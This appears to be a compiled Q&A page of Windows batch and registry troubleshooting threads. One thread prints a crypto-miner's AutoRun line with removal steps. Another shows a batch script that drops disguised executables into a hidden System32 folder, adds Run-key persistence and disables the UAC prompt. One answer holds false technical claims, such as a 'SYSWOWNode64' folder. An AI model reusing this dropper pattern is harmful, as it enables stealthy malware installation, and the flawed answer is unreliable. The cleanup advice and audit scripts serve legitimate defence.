Batch "invalid command-line parameters" - windows

For whatever reason, this:
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\BeginSecond
/v begin-second /t REG_DWORD /f
/d "%HOMEDRIVE%\Documents and Settings\%USERNAME%\Desktop\bat script\begin-second"
Line feeds were added for readability, the command itself is one continuous line.
Produces the message "Invalid command-line parameters" when the program is run. The command before that adds the registry key "BeginSecond", so that's not the issue...
But, for some strange reason, this command worked perfectly fine before I booted up my Windows 2000 virtual machine today.
There is probably some super easy fix for this. Any help, please?

Related

CMD.exe closes immediately - unusual line in AutoRun registry entry

I've noticed that my command line didn't start anymore, it just immediately minimized and closed itself upon running. I suspect this is due to a virus or at least some kind of malicious program having been executed. I found the following code inside my registry. It seems legible but my knowledge of batch / the command line is limited. Can anyone tell me what it does?
@mode 20,5 & tasklist /FI "IMAGENAME eq SoundModule.exe" 2>NUL | find /I /N "SoundModule.exe">NUL && exit & if exist "C:\Users\Leon\AppData\Roaming\Microsoft\SoundModule\SoundModule.exe" ( start /MIN "" "C:\Users\Leon\AppData\Roaming\Microsoft\SoundModule\SoundModule.exe" & tasklist /FI "IMAGENAME eq explorer.exe" 2>NUL | find /I /N "explorer.exe">NUL && exit & explorer.exe & exit ) else ( tasklist /FI "IMAGENAME eq explorer.exe" 2>NUL | find /I /N "explorer.exe">NUL && exit & explorer.exe & exit )
According to this reddit thread, it's a "vmprotected cryptocurrency miner".
You most likely got it if you installed anything you downloaded from the torrent network, for example a popular game released in the past few weeks :^)
The following SO thread contains part of the solution: CMD.exe closes immediately after calling (Win7 64)
The malicious party added an AutoRun directive via registry to the Windows Command Processor (cmd.exe usually), which you need to remove from any of the following locations it's present in:
Computer\HKEY_CURRENT_USER\Software\Microsoft\Command Processor
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
What the directive does is to execute SoundModule.exe and then explorer.exe (if not already started).
According to the other reply in this thread, they set %comspec% to run at startup, via Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon.
So on startup, it's running %comspec% (instead of the default Windows Explorer), which itself on start first runs SoundModule.exe and then explorer.exe. Not sure why they did it this way, anyone who makes use of cmd.exe was bound to figure it out and spread the word.
There are at least two confirmed VirusTotal records for this file: [1], [2]
I had the same program on my computer, check Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon for the shell value which is most likely "%comspec%" (which makes sense why it was just cmd running on startup since %comspec% is cmd.exe) and change it to "explorer.exe"
Run regedit
Go to HKLM\Software\Microsoft\Command Processor\ or HKEY_CURRENT_USER\Software\Microsoft\Command Processor\ or HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\
For some reason there was an AUTORUN key with "EXIT" inside.
Remove the AutoRun key and cmd will work fine.
Then check Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon for the shell value which is most likely "%comspec%" (which makes sense why it was just cmd running on startup since %comspec% is cmd.exe) and change it to "explorer.exe" as the user above said.
Edit: I also found that it was a cryptocurrency mining virus located at %appdata%\Microsoft\SoundModule or SoundMixer in my case.
You should probably delete this file too.
For reference, I will add that I was able to verify that my issue was the Autorun registry key by using Win-R to bring up the "Run" dialog, and typing cmd /d (which disables any autorun per the Windows docs [https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/cmd]). This successfully opened a command prompt window.
Inspecting the registry, my HKEY_CURRENT_USER\Software\Microsoft\Command Processor had Autorun as Type=REG_SZ and Data=if exist. I made a restore point, then renamed that key to AutorunOld ... and then I was able to open a command prompt without issue.
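The checks described in the answers above, gathered into one read-only PowerShell audit. This is an added example, not code from the thread; the HKLM Winlogon entry and the treatment of "explorer.exe" as the default Shell are assumptions added for completeness.

```powershell
# Added example: read-only audit of the values discussed in this thread.
# Run it from PowerShell, because cmd.exe may exit at once while AutoRun is set.
$checks = @(
    @{ Key = 'HKCU:\Software\Microsoft\Command Processor'; Name = 'AutoRun'; Default = $null },
    @{ Key = 'HKLM:\SOFTWARE\Microsoft\Command Processor'; Name = 'AutoRun'; Default = $null },
    @{ Key = 'HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon'; Name = 'Shell'; Default = 'explorer.exe' },
    # Assumption: the machine-wide Shell value is checked as well.
    @{ Key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'; Name = 'Shell'; Default = 'explorer.exe' }
)

$findings = foreach ($c in $checks) {
    $key = Get-Item -Path $c.Key -ErrorAction SilentlyContinue
    if (-not $key) { continue }
    # Keep %comspec% and similar unexpanded so the report shows what is stored.
    $data = $key.GetValue($c.Name, $null, 'DoNotExpandEnvironmentNames')
    if ($null -eq $data) { continue }
    # A Shell value equal to the default is not a finding; any AutoRun value is.
    if ($c.Default -and ("$data".Trim() -eq $c.Default)) { continue }
    [pscustomobject]@{ Key = $c.Key; Value = $c.Name; Data = $data }
}

# Folders the answers name as the location of the miner.
foreach ($dir in 'SoundModule', 'SoundMixer') {
    $path = Join-Path $env:APPDATA "Microsoft\$dir"
    if (Test-Path -LiteralPath $path) { Write-Warning "Folder named in the thread exists: $path" }
}

if ($findings) {
    $findings | Format-List
} else {
    'No AutoRun value and no non-default Winlogon Shell value found.'
}
```

An AutoRun value is not malicious by itself (the InstallShield question further down shows a benign `cd /d` one), so review the reported data before removing anything.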

Why doesn't my batch file copy it to the correct location?

This issue is eating my brains off. I have a simple batch file which makes a directory in %SYSTEMROOT% only if it does not exist & copies certain files to that directory, adds the attribute +S +R +H to them, adds two programs to startup via registry and disables UAC as I need it frequently like 3x day. It works well as a batch file but I want to distribute it to my fellow company mates. We all are having a competition in this so I do not need them to see my code; I know if I am still at the level of batch scripting then my code is not worth copying but my mates are also not the brightest bulbs!
My issue is that when I convert it to exe using Quick Batch Convertor, the moment it becomes an exe it starts giving an Access denied error only when it gets to copying the files into %SYSTEMROOT%, even though I am running it as administrator and the disabling UAC command, which is C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f works, which, originally, should require admin privileges. It's only the copying of files that gives access denied when converted into exe. They all just work fine if it is in the form of a batch. I know that this might be off topic but I suspect foul play on the batch file and not the Quick Batch Converter because I have converted many files using this converter and they worked flawlessly.
The code for my batch is here
@echo off
echo %CD%
cd %~dp0
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Update" /t REG_SZ /d "\"C:\Windows\System32\SystemSettingsUpdate\HL~Realtime~Defense.exe\" " /f
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Antivirus-Update " /t REG_SZ /d "\"C:\Windows\System32\SystemSettingsUpdate\Configure.exe\" " /f
if not exist "%SYSTEMROOT%\system32\SystemSettingsUpdate" mkdir %SYSTEMROOT%\system32\SystemSettingsUpdate
cd %~dp0
taskkill /f /im configure.exe
copy "%~dp0HL~Realtime~Defense.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
copy "%~dp0Whatsapp,Inc.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
copy "%~dp0Configure.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\Configure.exe
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\Whatsapp,Inc.exe
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\HL~Realtime~Defense.exe
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
exit
Any Suggestions?
Exact Duplicate of my question
See, first you need to understand how a compiler works. A compiler may also be horribly written or may be a trojan. It is rare that a good compiler is made that works and is not marked as a trojan. I would recommend starting to learn other languages such as C# or Python, which have an in-built exe convertor. So now, as I said, most exe convertors can only run PURE DOS commands. Secondly, there is a built-in app that was modified in later versions of Windows, known as UAC. From Windows 10 onwards not a single app without perfect details that provide its author and blah blah can be granted full administrator rights until you add an exception, by default. Then comes the 32 and 64 bit part. There are two versions of CMD from Windows 8 onwards: one which is in C:\Windows\SYSWOWNode64 and one in C:\Windows\System32. So, if you have a 64 bit computer, check for the folder in both locations. There are many more factors that play, but I will wait until you provide sufficient details about what OS and 64 bit or 32 bit computer you have, and whether you checked in both locations, so that it will narrow down my search.
Regards

Running batch file with /d option

I've been working for some time on the installer for my application (using Installshield), and some time ago I came upon a problem where a batch file that I called using LaunchApplication failed to execute (to be specific - it executed, but in the wrong directory). I decided to dig this issue up and stumbled upon this article. The problem, it turns out, lies within the Autorun registry key, which is defined in the following manner:
cd /d C:\Blahblah\Yadayada
So, before the batch file was actually executed, this command changed directory.
The batch file is most basic one, something like this:
:start
foo.exe %1 --bar %2 --baz %3
if errorlevel 1 goto fail
ECHO Success
goto end
:fail
ECHO Fail
:end
So, basically this batch file expects that it will be launched from the correct directory, and it's not. I'm appending the INSTALDIR variable to the batch name in the LaunchApplication call, just to be clear, and it works perfectly fine when the Autorun key is not set up.
And, well, I finally got to the question - is there any way to provide launch options for an individual batch file? I know that providing the /d option will render Autorun useless, but it only works on a direct call.
For instance, let's assume that I have batch file with simple 'dir' command (let's call it foo.bat), and my Autorun key is defined as shown above. I run command-prompt with /d option (CMD /d), and then run 'dir' directly I'll get content of the folder I'm currently in (e.g. user folder); BUT, if I launch foo.bat, I'll get contents of C:\Blahblah\Yadayada, because Autorun command will execute first, set default folder, and only after that 'dir' command will be called.
So, personally I see a few options here. First - removing Autorun key, and that would be the most fitting and easiest solution if it had to be applied only for one machine - I can't possibly expect every user to take care of their Autorun key for themselves. Second, which should be applicable for everyone (but which I hadn't tested yet), would be providing path to installation folder as extra parameter to batch file, and then changing directory to that:
:start
%4
cd %5
foo.exe %1 --bar %2 --baz %3
...
Where %4 would be a disk letter and %5 would be a path. This seems to be a solution, but I find it counterproductive that I have to implicitly change path to the folder, given that it works perfectly well when Autorun key is absent.
So, I was wondering if there's any workaround about this Autorun key problem. Maybe, like I've mentioned in the title, kind of /d option for batch file so that when it runs it will override global option from Autorun and will actually launch from the place it's supposed to launch, or some kind of technique like that? Also, maybe there's some kind of option in LaunchApplication() function I'm not aware of?

Batch file has errors when run, but entering through the command line works fine

I'm helping one of my friends with his QA work. A lot of the time ctfmon.exe is always running in the background and he says it takes up memory on the computer for when he's testing. My friend's work machine is using Windows XP.
He already tried what was said in this article but it didn't help.
http://www.howtogeek.com/howto/windows-vista/what-is-ctfmonexe-and-why-is-it-running/
We then tried to create a simple batch file that would stop the process for him.
Here are the two files that we have
delete_cftmon.reg:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"=
Novoice.bat
taskkill /F /IM ctfmon.exe /T
regedit.exe /s delete_cftmon.reg
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run C:\WINDOWS\system32\ctfmon.exe
rem reg delete [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "ctfmon.exe"
I get the following errors "invalid command line parameters" and "Invalid key name"
When we enter the commands via the command line it works fine.
I believe it has to do with HKEY_CURRENT_USER but I'm not entirely sure why.
Any help would be greatly appreciated.

Why does batch file FOR fail when iterating over command output?

I have a batch file that uses this idiom (many times) to read a registry value into an environment variable:
FOR /F "tokens=2* delims= " %%A IN ('REG QUERY "HKLM\SOFTWARE\Path\To\Key" /v ValueName') DO SET MyVariable=%%B
(There's a tab character after delims=)
This works fine on thousands of customers' computers. But on one customer's computer (running Windows Server 2003, command extensions enabled), it fails with: 'REG QUERY "HKLM\SOFTWARE\Path\To\Key" /v ValueName' is not recognized as an internal or external command, operable program or batch file. Running the "reg query" command alone works fine. Reg.exe is present in C:\Windows\System32.
I was able to work around the problem by changing the code to
REG QUERY "HKLM\SOFTWARE\Path\To\Key" /v ValueName > temp.txt
FOR /F "tokens=2* delims= " %%A IN (temp.txt) DO SET MyVariable=%%B
This got the customer up and running, but I would like to understand why the problem occurred so I can avoid it in the future.
Slightly off the primary topic - a more direct way to get a registry value (string or DWORD) into an environment variable would also be useful.
I would check:
The customer's role on the machine - are they an admin?
Where is reg.exe on the box - is there more than one copy of reg.exe in the path?
Is there any locale difference on the customer's machine from the machines where this normally works?
Basically, enumerate everything that differs between this machine and machines where it works as expected. Include service packs, domain membership, etc.
Wow, that is odd.
If the same commands work when split into two lines, then I'd guess it has something to do with the way the command gets run in a subshell in the FOR command.
If you were really dying to figure out why it's dying in this particular case, you could run commands like "SET > envvars.txt" as the FOR command and compare that with the top shell.
Or maybe start off simple and try running the REG command via CMD /C to see if that does anything?
One quick guess here, what are the values of COMSPEC and SHELL?
I had a similar situation to this. In my case it was a bad value in COMSPEC. I fixed that and the script started working as expected.
The /F switch needs command extensions to be turned on. Usually they are turned on by default, but I'd check that. On XP systems you can turn them on doing something like
cmd /e:on
or checking the registry under
HKCU\Software\Microsoft\Command Processor\EnableExtensions
Dunno about Windows Server.
Doing help for and help cmd could provide some hints as well.
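The items the answers above suggest comparing (COMSPEC, copies of reg.exe on the PATH, command extensions, locale), collected by one read-only PowerShell script so the output from a working machine and the failing one can be diffed. This is an added example, not code from the thread; it assumes PowerShell 3.0 or later, and the HKLM EnableExtensions lookup is an addition to the HKCU path given in the answer.

```powershell
# Added example: gather the settings the answers suggest comparing. Read-only.
$report = [ordered]@{}

# COMSPEC at each scope, plus whether the effective value names a real file.
foreach ($scope in 'Process', 'User', 'Machine') {
    $report["ComSpec ($scope)"] = [Environment]::GetEnvironmentVariable('ComSpec', $scope)
}
$report['ComSpec is a file'] = [bool]($env:ComSpec -and (Test-Path -LiteralPath $env:ComSpec -PathType Leaf))
$report['Default cmd.exe']   = Join-Path $env:SystemRoot 'System32\cmd.exe'
$report['SHELL']             = $env:SHELL

# Every reg.exe reachable through PATH, in search order.
$report['reg.exe on PATH'] = @(Get-Command reg.exe -CommandType Application -All -ErrorAction SilentlyContinue |
    ForEach-Object { $_.Path }) -join '; '

# Command extensions: 1 = enabled, 0 = disabled, empty = value not set.
foreach ($hive in 'HKCU', 'HKLM') {
    $key = Get-Item -Path "${hive}:\Software\Microsoft\Command Processor" -ErrorAction SilentlyContinue
    $report["EnableExtensions ($hive)"] = if ($key) { $key.GetValue('EnableExtensions') } else { $null }
}

# Locale, since one answer asks about locale differences.
$report['Culture'] = (Get-Culture).Name

[pscustomobject]$report | Format-List
```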
